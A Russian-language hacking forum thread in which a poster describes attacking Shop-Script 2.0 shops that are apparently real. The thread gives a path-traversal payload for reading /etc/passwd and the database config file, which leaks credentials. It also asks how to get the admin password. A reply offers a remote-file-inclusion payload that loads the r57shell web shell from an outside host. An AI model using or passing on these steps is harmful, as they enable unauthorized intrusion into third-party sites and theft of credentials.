Прочитал статью в Хакере за февраль. Там описывался взлом Shop-Script'a 2.0. И вот решил попробовать. Собсно вот возникшая трабла:
1. подставив в index.php?aux_page=../../../../../../../etc/passwd вылезли логины - т.е. тут все нормуль
2. потом пихаем ../cfg/connect.onc.php - и тут в исходном txt страницы светяцца BD_HOST, DB_USER, DB_PASS, DB_NAME и ADMIN_LOGIN.
Тока вот в DB_HOST почему всегда (на разных шопах пробавал) стоит localhost..
Собсно как приконектица к Базе-то, шоб паролик выудить от админки? :confused:

index.php?aux_page=http://rst.void.ru/download/r57shell.txt?

там и введешь.

Если б можно было везде конектиться с инета на базу.. Эх!

localhost - это комп на котором стоит мускуль, т.е. и мускуль и сайт на одной тачке. Если в мускуле не стоит коннект только с локалхоста, то подставляй сайт который ломаешь, впринцепе можно и айпишник.

Фтыкал и сайт и IP..и нифика не катит..
ЗЫ А ничо если файл sql.php (от RST) лежит у мя на сайте..?Я оттуда пытаюсь..